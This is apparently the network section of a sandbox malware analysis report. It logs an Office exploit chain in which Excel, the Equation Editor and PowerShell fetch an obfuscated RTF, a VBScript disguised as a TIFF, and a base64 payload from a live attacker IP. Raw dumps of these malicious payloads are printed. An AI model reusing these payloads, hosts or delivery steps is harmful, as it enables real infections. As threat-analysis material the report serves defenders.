                                                              • 137.184.234.91
                                                              • geoplugin.net
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.2249166137.184.234.91803512C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              Aug 28, 2024 14:00:23.515810013 CEST469OUTGET /77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc HTTP/1.1
                                                              Accept: */*
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: 137.184.234.91
                                                              Connection: Keep-Alive
                                                              Aug 28, 2024 14:00:24.120975018 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 28 Aug 2024 12:00:24 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Wed, 28 Aug 2024 07:42:49 GMT
                                                              ETag: "c9b8-620b981389be8"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 51640
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/msword
                                                              Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 70 49 6e 73 63 72 69 62 65 32 37 33 36 32 39 33 36 33 20 5c 25 7d 0d 7b 5c 39 31 31 33 37 36 30 35 34 3a 27 3d 40 3c 28 5b 7e 3f 5e 7e 5f 31 b0 2f 60 21 29 23 b0 28 3a 25 2f 7e 29 5b 21 2e 7c 2b 3c 7e 38 7e 21 25 27 33 7c 3f 23 26 3e 5f 3d 60 23 30 31 5f 3f 2d 40 7e 3e 3e 3d 25 2c 40 5b 2f 2c 33 3b 38 40 2b 39 2b 25 3e 2e 3d 39 32 60 34 5b 2f 32 26 3f 3a 35 29 2f 3f 26 3f 23 25 3f 7e 5f b5 3a 32 24 3b 33 35 3b 38 34 3e 2c 29 2e 2e 2f 33 5b 7c 33 38 2e 3d 24 32 3e 5d 31 2e 7c 3f 3c 3d b5 21 3d 2f 2f 28 5d 27 2b 2a 7c 3d 5f 36 21 b0 2b 38 35 3f 5b 2f 5e 25 2b 5d 27 7c 2e 5b 3f a7 a7 2a 38 40 2f 3f 3d 5d 7e 2c 37 36 2e 3f 34 21 2f 37 b0 5d 5b 3f b0 30 5e 5f 23 36 2c 5f 32 3f b5 34 2a 7e 2a 35 2f 2a 31 2e 38 30 28 36 35 3d 3c a7 24 38 5e 60 5f 3e 2f 25 29 3c 3f 33 3f 7e 3f 25 3f 7c 5d 29 5d 3f 2c 2e 2b 34 21 3f 28 b0 31 39 31 29 29 3f 3f 26 25 5f 5b 3f 2c a7 3c 5e 29 7c 23 2e 32 25 26 3f 3f 23 3e 21 3a 3f 29 3f 31 34 21 27 3d 3d [TRUNCATED]
                                                              Data Ascii: {\rtf1{\*\pInscribe273629363 \%}{\911376054:'=@<([~?^~_1/`!)#(:%/~)[!.|+<~8~!%'3|?#&>_=`#01_?-@~>>=%,@[/,3;8@+9+%>.=92`4[/2&?:5)/?&?#%?~_:2$;35;84>,)../3[|38.=$2>]1.|?<=!=//(]'+*|=_6!+85?[/^%+]'|.[?*8@/?=]~,76.?4!/7][?0^_#6,_2?4*~*5/*1.80(65=<$8^`_>/%)<?3?~?%?|])]?,.+4!?(191))??&%_[?,<^)|#.2%&??#>!:?)?14!'==$96`1~;?>&%@%=&???8?%4%]#^-=<~5|^%3?0%^5%%16<,(`^7|^<$4`12>?%)&.?%|%[?^->777!?:%#/*)14!|!:<8.63/%@$>:1'35%/`,?!~2>*6@/12~?>98;95)%@=~?%_?!;;??`&?@?/!50>*8&6%|?@207^1(;*9|=@'?,5|7!5%^+?(?(6?%&&/<#<9+8<:[$6[;?/@-*?7*7[8]%?[<?-_!<=.#!)9<27@?3!]?!;4#??4|8?8>$00)9**948:>=[_7,`/&0?%%??4)&.,8[[&3>080'-^88_8[6%3&,`?65$1[??|?[2.`'^_#??%?!&)1=>(9/~7?&<_84.(])]#,`*<?@5,%_/4??!)-!=2;'4;?/^.~#1%>?%2?+!$9_?,.-?_.+<]~&?|@];)7?;.-#.<?*1?9?%$)9)|???@<==5/.>->?+#[).~&&^1#9<!1(:1:%2.?#962990$1?|?5'82,#-?;$1.!(52](`[~^%/]|`^7:>&`:[!_#![?=`^'_[-8*/']@8<3?
                                                              Aug 28, 2024 14:00:24.121001959 CEST1236INData Raw: b0 5b 21 3f 25 25 29 5e 3f 5d b0 3b 26 3f 32 3f 2f b5 25 25 3a 2a 33 7e 5b 5e 2a 3b 25 7e 2a 7c 3b 3f 3f 2e 3e 5e 21 2e 25 3f 29 3a 5f 5f 33 26 5d 2c 24 39 b0 2d 2a 3c 40 3f 2a 33 7c 60 3c 3f 24 38 21 25 5d 2c a7 5d 3a 7e 34 5e 3f 24 34 35 3f 32
                                                              Data Ascii: [!?%%)^?];&?2?/%%:*3~[^*;%~*|;??.>^!.%?):__3&],$9-*<@?*3|`<?$8!%],]:~4^?$45?2%<?%?~=(78#:6?/?11~2^.^12~)_,?5????@*;84'$)#.?3`4[,?6+5/(%?.`??5.%*&'5(/![2[[=?*%?>3-=.%('5?%(2&_>*_92-94#%19;|%??-???:2-[&#`8*;^|@53??]|%?*)4!(>*#0_^
                                                              Aug 28, 2024 14:00:24.121014118 CEST1236INData Raw: 3f 30 35 60 27 3f 34 39 25 5b 5e 5d 3a 28 3f 32 60 2d 34 32 23 37 25 29 40 7c 34 3f 28 a7 2e 5f 39 24 24 b5 3a 23 5d 5e 5f 29 32 3f 2f 36 60 5e 28 24 3c 3f 7c 7c 3f 60 33 3c 27 3f 24 5d 26 28 7c 37 2e 23 30 7c 2a 21 5b 35 24 33 7e 3d 21 5f 32 2f
                                                              Data Ascii: ?05`'?49%[^]:(?2`-42#7%)@|4?(._9$$:#]^_)2?/6`^($<?||?`3<'?$]&(|7.#0|*![5$3~=!_2/.>&?|<<)<(4;-%6$#&,#+??>#2&&<&~10^8%'%%%~(@47[?%`%`'@*$1+,-?0[](1!%??^7+|*1>&[3>-3|5/*+!72?[/?,<@8?_=):`?$?6[_$%*~7:0@5,#3%1!5`++??>.(*'<,&=6_
                                                              Aug 28, 2024 14:00:24.121032000 CEST1236INData Raw: 24 3f 36 5e 3e 24 36 3d 24 60 32 b0 3f 25 39 34 40 2b 2f b0 2f 3f 2c 7e 28 7c 29 25 30 3f 3a 3f 5e 7e 36 5f 40 3f 26 30 21 36 2b 3d 21 25 31 32 31 5f 3f a7 27 5e 32 35 25 60 37 3f 40 2c 5e 60 37 35 3f 38 28 40 3d 37 35 2c 2d 2c 2f 38 60 b0 37 60
                                                              Data Ascii: $?6^>$6=$`2?%94@+//?,~(|)%0?:?^~6_@?&0!6+=!%121_?'^25%`7?@,^`75?8(@=75,-,/8`7`14;6`[`$#([[$6?7+?06?6:16.?#&:`.$6(;1?.?|*?_?9&-]|%*(-5]`$`~1/,.5.[?=9:=/>.%%2(0<8(8?-?72(6@,9<.*@22#?].38@@+)+8_=6];_6./9^$'|%&?!]'+/?3??]=?)5@];[?2
                                                              Aug 28, 2024 14:00:24.121045113 CEST1236INData Raw: 2d 39 3e 36 2c 5f 25 3a 33 26 40 2a 32 36 3f 3f 24 2b 40 2a 3f 3f 40 27 5e 24 38 7c 24 32 33 24 2d 5f 31 31 3f 2d 33 31 3f 39 40 2f 7e 38 2e 2e 7e 30 23 3a 7e 26 2d 2f 37 36 34 3f 3a 32 b0 2f 31 3f 7c 23 29 5b 3e a7 40 34 39 23 7e 2b 3f 3f 34 26
                                                              Data Ascii: -9>6,_%:3&@*26??$+@*??@'^$8|$23$-_11?-31?9@/~8..~0#:~&-/764?:2/1?|#)[>@49#~+??4&??<*]/)':00,#|?<?$.?;^-~=%/>6?#*%0$9$|5?'**.)0#?8+~`%@++1.%|)45#(*4??3&?%?(2;*^!'*8/(.?2?!^8?+7[$4<*18~|?+6,766)2$+_7!*1%#,'*`!1##/'*960'|][?%'&=2@~!`1
                                                              Aug 28, 2024 14:00:24.121057034 CEST1236INData Raw: 27 34 7e 38 b0 27 60 32 7e 40 3f 2c 34 2a 2c 3f 3f 29 23 3f 5f 2f b5 3e 35 3f 2b 2c 3f 39 b0 3f 3f 37 36 5b 36 3b 2c 2b 30 40 5e 3f 2d 29 5e 5d 7e 3f 38 30 25 25 24 25 2f 3f 3c 5d 32 38 2b 34 39 3b 2d 36 3f 2f 40 25 31 60 2e 33 2c 5e 30 33 3f 7e
                                                              Data Ascii: '4~8'`2~@?,4*,??)#?_/>5?+,?9??76[6;,+0@^?-)^]~?80%%$%/?<]28+49;-6?/@%1`.3,^03?~<0@4:`_*%/?$^847+?<*4,->?=|^[?%!?__5!?5>%[5*%28*;9%|(#66498?4>7[5'/?=)9?%#%.$?[8@&2%@?&?%_|))971'36'$3_',~21.^5=40/??2/~!!1?/??#>:1-%*?])?=;5)@?4;?5~
                                                              Aug 28, 2024 14:00:24.121068954 CEST1236INData Raw: 3e 5b 3f 34 39 3c 36 31 40 31 5e 31 3b 2d 3f 3a 2b b0 3a 37 32 38 33 5f 7c 5f 28 5b 5f 5d 38 30 b5 33 2d 35 34 2c 34 5b 32 5f 3f 2c a7 3e 7e 35 2e 31 3f 38 2a 5d 38 3e 3f 23 27 24 3e 2d b0 a7 a7 29 23 24 39 3f 3f b5 7c 60 7c b0 5f 31 25 7e a7 3f
                                                              Data Ascii: >[?49<61@1^1;-?:+:7283_|_([_]803-54,4[2_?,>~5.1?8*]8>?#'$>-)#$9??|`|_1%~?2/)4/?.738:^<&^8<^9%,(@?74?^:[63`1<)`:@?)%;?0'4_?/?)+7~^%*@];0%)9:<-`-:8,2=_1^_/,?8?=|%2?9?`>>?`!)#]4>?#9)7+@^2%$?1!?@!#/9;||@&?^%?5`.')$*?(6`:`#18.(8*%6$
                                                              Aug 28, 2024 14:00:24.121079922 CEST1236INData Raw: 7b 5c 2a 5c 61 74 65 78 74 33 31 31 37 32 38 31 37 35 20 5c 62 69 6e 30 30 30 30 30 30 30 5c 37 30 34 31 39 30 31 33 30 31 32 34 38 34 37 39 34 34 7d 0d 5c 68 72 38 38 37 39 33 32 36 36 37 35 36 37 5c 64 6f 6e 6f 74 65 6d 62 65 64 73 79 73 66 6f
                                                              Data Ascii: {\*\atext311728175 \bin0000000\704190130124847944}\hr887932667567\donotembedsysfont627801628122731\'
                                                              Aug 28, 2024 14:00:24.121094942 CEST1236INData Raw: 0d 30 30 30 09 09 20 09 20 09 20 09 20 09 09 09 09 20 09 09 20 20 09 35 64 30 0d 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0d 0d 0d 0a 0d 0a 0d 0d 37 20 09 09 20 09 20 20 09 09 20 09 09 09 20 09 09 20 20 09 30 30 0a 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d
                                                              Data Ascii: 000 5d07 000002cad9bf25
                                                              Aug 28, 2024 14:00:24.121108055 CEST1236INData Raw: 09 09 09 09 09 20 09 09 09 20 09 20 20 65 30 33 33 39 61 65 09 09 20 20 20 09 09 09 09 09 09 20 09 09 09 20 09 20 20 33 34 34 0a 0a 0d 0d 0a 0a 0d 0d 0d 0a 0a 0d 0a 0a 0d 0a 0a 0a 0d 0d 0d 30 0a 0a 0a 0d 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0a 0a 0a
                                                              Data Ascii: e0339ae 34400 9 582d06 34e84f 9
                                                              Aug 28, 2024 14:00:24.126106024 CEST1236INData Raw: 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 39 20 09 09 09 09 09 20 09 09 09 20 09 20 20 20 09 09 20 20 63 33 0d 0a 0d 0a 0d 0d 0d 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 36 38 09 20 20 09 09 09 20 09 09 09 20 09 20 20 20 09 09 20 20 62 65
                                                              Data Ascii: 9 c368 be19a bf 0 40e 8751


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.2249173137.184.234.91803784C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              TimestampBytes transferredDirectionData
                                                              Aug 28, 2024 14:00:40.179991007 CEST282OUTHEAD /77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc HTTP/1.1
                                                              User-Agent: Microsoft Office Existence Discovery
                                                              Host: 137.184.234.91
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Aug 28, 2024 14:00:40.770308971 CEST321INHTTP/1.1 200 OK
                                                              Date: Wed, 28 Aug 2024 12:00:40 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Wed, 28 Aug 2024 07:42:49 GMT
                                                              ETag: "c9b8-620b981389be8"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 51640
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/msword


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.2249174137.184.234.91804084C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              TimestampBytes transferredDirectionData
                                                              Aug 28, 2024 14:00:41.311449051 CEST338OUTGET /77/weneedsmoothbunwithbutterchoco.tIF HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: 137.184.234.91
                                                              Connection: Keep-Alive
                                                              Aug 28, 2024 14:00:41.891117096 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 28 Aug 2024 12:00:41 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Wed, 28 Aug 2024 06:48:08 GMT
                                                              ETag: "2c7ba-620b8bdaf9315"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 182202
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: image/tiff
                                                              Data Raw: ff fe 0d 00 0a 00 6d 00 6e 00 57 00 4c 00 74 00 67 00 69 00 62 00 4c 00 6b 00 20 00 3d 00 20 00 22 00 5a 00 51 00 74 00 4c 00 65 00 64 00 54 00 55 00 42 00 75 00 22 00 0d 00 0a 00 4b 00 62 00 50 00 5a 00 5a 00 66 00 6b 00 65 00 65 00 4e 00 20 00 3d 00 20 00 22 00 75 00 7a 00 4b 00 4c 00 6f 00 47 00 76 00 74 00 6a 00 4e 00 22 00 0d 00 0a 00 65 00 78 00 41 00 57 00 69 00 6d 00 57 00 43 00 70 00 63 00 20 00 3d 00 20 00 22 00 51 00 69 00 62 00 73 00 42 00 73 00 4f 00 63 00 69 00 42 00 22 00 0d 00 0a 00 47 00 41 00 4c 00 64 00 68 00 63 00 53 00 63 00 4b 00 4c 00 20 00 3d 00 20 00 22 00 74 00 63 00 66 00 47 00 6e 00 55 00 41 00 66 00 5a 00 4c 00 22 00 0d 00 0a 00 41 00 66 00 69 00 6c 00 66 00 73 00 69 00 62 00 48 00 57 00 20 00 3d 00 20 00 22 00 69 00 7a 00 68 00 72 00 6b 00 6f 00 62 00 49 00 42 00 6b 00 22 00 0d 00 0a 00 4f 00 69 00 65 00 5a 00 64 00 4c 00 61 00 78 00 6b 00 63 00 20 00 3d 00 20 00 22 00 4b 00 63 00 47 00 4a 00 67 00 4c 00 47 00 70 00 70 00 73 00 22 00 0d 00 0a 00 4a 00 47 00 68 00 52 00 [TRUNCATED]
                                                              Data Ascii: mnWLtgibLk = "ZQtLedTUBu"KbPZZfkeeN = "uzKLoGvtjN"exAWimWCpc = "QibsBsOciB"GALdhcScKL = "tcfGnUAfZL"AfilfsibHW = "izhrkobIBk"OieZdLaxkc = "KcGJgLGpps"JGhRKdeOWi = "WjLUHbkGkb"iLkAoLzLUc = "NtWZUCzWWk"iWkOccqLAd = "LTGGKRGphO"zKBWpJfcgZ = "LGqKfWHlci"bildLWPWPA = "WHLPPWWmpb"AnrWbLRpbi = "UnfLfNpKqn"uTLaipJbcl = "nzcWLKelGN"iqLRPxLKhi = "WCKmKoLhGb"WokATNeoPu = "kfqpjTrrUo"lrnxvxtddL = "ObhBBeWzBh"LULKxLafoL = "pLGLgKRzWi
                                                              Aug 28, 2024 14:00:41.891144037 CEST224INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 47 00 4b 00 4a 00 41 00 66 00 55 00 5a 00 75 00 6c 00 57 00 20 00 3d 00 20 00 22 00 57 00 61 00 4f 00 61 00 75 00 64 00 4c 00 66 00 66 00 73 00 22 00 0d 00 0a 00 5a 00 57 00 64 00 42 00 57 00 55 00 57 00 4b 00 4c
                                                              Data Ascii: "GKJAfUZulW = "WaOaudLffs"ZWdBWUWKLA = "BaeUGLdRKg"gocWcWdUro = "fpiKLomUtu"NcfazZAaUU = "lWKlLWzkkK"
                                                              Aug 28, 2024 14:00:41.891150951 CEST1236INData Raw: 00 0a 00 4c 00 51 00 71 00 57 00 4c 00 4f 00 71 00 6e 00 66 00 57 00 20 00 3d 00 20 00 22 00 6d 00 68 00 6b 00 43 00 47 00 6e 00 52 00 4b 00 54 00 4c 00 22 00 0d 00 0a 00 6d 00 4e 00 68 00 55 00 6d 00 4f 00 4b 00 4b 00 75 00 65 00 20 00 3d 00 20
                                                              Data Ascii: LQqWLOqnfW = "mhkCGnRKTL"mNhUmOKKue = "ahizKLfWUG"ZUcqGphppf = "WilfAvKLGn"WRLpmeLNUc = "RjLisoZLLC"ZNUNqcjZKZ =
                                                              Aug 28, 2024 14:00:41.891156912 CEST1236INData Raw: 00 74 00 55 00 57 00 74 00 47 00 22 00 0d 00 0a 00 74 00 4b 00 63 00 57 00 53 00 4c 00 4a 00 74 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 74 00 69 00 41 00 68 00 57 00 4c 00 74 00 72 00 69 00 47 00 22 00 0d 00 0a 00 6d 00 62 00 70 00 73 00 73 00 4c
                                                              Data Ascii: tUWtG"tKcWSLJtKk = "tiAhWLtriG"mbpssLmKau = "BcGcWKxvbz"tlCrBeGnnN = "LiKbWNGiPi"naIAWLirWN = "ArikUGLWaf"Lpo
                                                              Aug 28, 2024 14:00:41.891161919 CEST1236INData Raw: 00 43 00 41 00 20 00 3d 00 20 00 22 00 65 00 57 00 7a 00 4c 00 6e 00 69 00 69 00 57 00 69 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 55 00 4b 00 52 00 57 00 52 00 78 00 41 00 66 00 55 00 6d 00 20 00 3d 00 20 00 22 00 6f 00 43 00 50 00 5a 00 50 00 50
                                                              Data Ascii: CA = "eWzLniiWiL"UKRWRxAfUm = "oCPZPPiUbB"CLaPWKHgoZ = "KpatSklWZB"LLoNBiLGGn = "oiPLxqCxUO"icJctabocaqLpL = "p
                                                              Aug 28, 2024 14:00:41.891168118 CEST1236INData Raw: 00 6d 00 61 00 22 00 0d 00 0a 00 74 00 50 00 73 00 68 00 7a 00 74 00 50 00 6d 00 4c 00 41 00 20 00 3d 00 20 00 22 00 4c 00 6c 00 6d 00 61 00 69 00 4c 00 63 00 6e 00 67 00 64 00 22 00 0d 00 0a 00 63 00 65 00 69 00 70 00 4c 00 4c 00 61 00 69 00 65
                                                              Data Ascii: ma"tPshztPmLA = "LlmaiLcngd"ceipLLaieo = "igoNWdzxKm"JappLUcvIm = "czLsAGGWGN"RbsnjjiWWe = "OqZQxGpWLL"aKgtWmPq
                                                              Aug 28, 2024 14:00:41.891172886 CEST1236INData Raw: 00 62 00 6f 00 63 00 61 00 47 00 68 00 69 00 20 00 3d 00 20 00 22 00 7a 00 4c 00 67 00 63 00 4e 00 69 00 78 00 69 00 41 00 69 00 22 00 0d 00 0a 00 69 00 41 00 6e 00 69 00 66 00 70 00 4f 00 71 00 4c 00 63 00 20 00 3d 00 20 00 22 00 43 00 4b 00 47
                                                              Data Ascii: bocaGhi = "zLgcNixiAi"iAnifpOqLc = "CKGoKGULBZ"LWiKhOdfZN = "CliuWWeikB"ifiNmoNfcu = "fCLeqcWocx"kUiCOULmRO = "OO
                                                              Aug 28, 2024 14:00:41.891177893 CEST552INData Raw: 00 66 00 69 00 63 00 62 00 67 00 4a 00 6e 00 22 00 0d 00 0a 00 64 00 62 00 6b 00 69 00 51 00 57 00 4c 00 4c 00 47 00 4c 00 20 00 3d 00 20 00 22 00 4c 00 57 00 6d 00 52 00 4b 00 76 00 6d 00 4b 00 65 00 69 00 22 00 0d 00 0a 00 68 00 4f 00 69 00 47
                                                              Data Ascii: ficbgJn"dbkiQWLLGL = "LWmRKvmKei"hOiGZqiPoI = "WizOKzzLrp"KKKhlnkWzL = "WKmWpgSxZL"neiHtabocakLZA = "bdnzWsfAZi
                                                              Aug 28, 2024 14:00:41.891182899 CEST1236INData Raw: 00 6d 00 69 00 43 00 65 00 7a 00 4e 00 75 00 22 00 0d 00 0a 00 4b 00 47 00 64 00 4b 00 64 00 63 00 55 00 68 00 68 00 42 00 20 00 3d 00 20 00 22 00 61 00 4c 00 4e 00 6b 00 5a 00 42 00 63 00 6e 00 63 00 4c 00 22 00 0d 00 0a 00 65 00 74 00 7a 00 4c
                                                              Data Ascii: miCezNu"KGdKdcUhhB = "aLNkZBcncL"etzLczfKeU = "eeeftLIaWG"WLlfLLWstr = "LfcctabocaGUoi"bmCdWrmnnL = "NQccWWWBAL
                                                              Aug 28, 2024 14:00:41.891201019 CEST1236INData Raw: 00 53 00 49 00 52 00 48 00 20 00 3d 00 20 00 22 00 4b 00 6d 00 43 00 47 00 6f 00 57 00 50 00 6c 00 74 00 72 00 22 00 0d 00 0a 00 0d 00 0a 00 76 00 48 00 61 00 5a 00 61 00 4e 00 74 00 52 00 57 00 6b 00 20 00 3d 00 20 00 22 00 75 00 4f 00 6d 00 6a
                                                              Data Ascii: SIRH = "KmCGoWPltr"vHaZaNtRWk = "uOmjhbuSia"fmiWZgAcWA = "khTOqPhknb"BmeUUsWJPo = "hCqdLcicZG"heKJzLLihR = "iic
                                                              Aug 28, 2024 14:00:41.896337032 CEST1236INData Raw: 00 4c 00 69 00 6f 00 6b 00 22 00 0d 00 0a 00 57 00 5a 00 50 00 57 00 65 00 74 00 57 00 69 00 6b 00 71 00 20 00 3d 00 20 00 22 00 4e 00 63 00 65 00 78 00 4f 00 55 00 4e 00 4f 00 47 00 6b 00 22 00 0d 00 0a 00 70 00 78 00 68 00 52 00 63 00 41 00 66
                                                              Data Ascii: Liok"WZPWetWikq = "NcexOUNOGk"pxhRcAfhoa = "LLQBzxGrem"GoUhiTWacN = "pQOoocWzhI"UrUlkBnWeL = "dzfKHCZRZz"zLlZRm


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.2249176137.184.234.91802692C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Aug 28, 2024 14:00:49.894599915 CEST75OUTGET /77/RBCF.txt HTTP/1.1
                                                              Host: 137.184.234.91
                                                              Connection: Keep-Alive
                                                              Aug 28, 2024 14:00:50.525155067 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 28 Aug 2024 12:00:50 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Wed, 28 Aug 2024 06:41:20 GMT
                                                              ETag: "a1000-620b8a561eda8"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 659456
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain
                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                              Aug 28, 2024 14:00:50.525171995 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                                              Aug 28, 2024 14:00:50.525178909 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                              Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
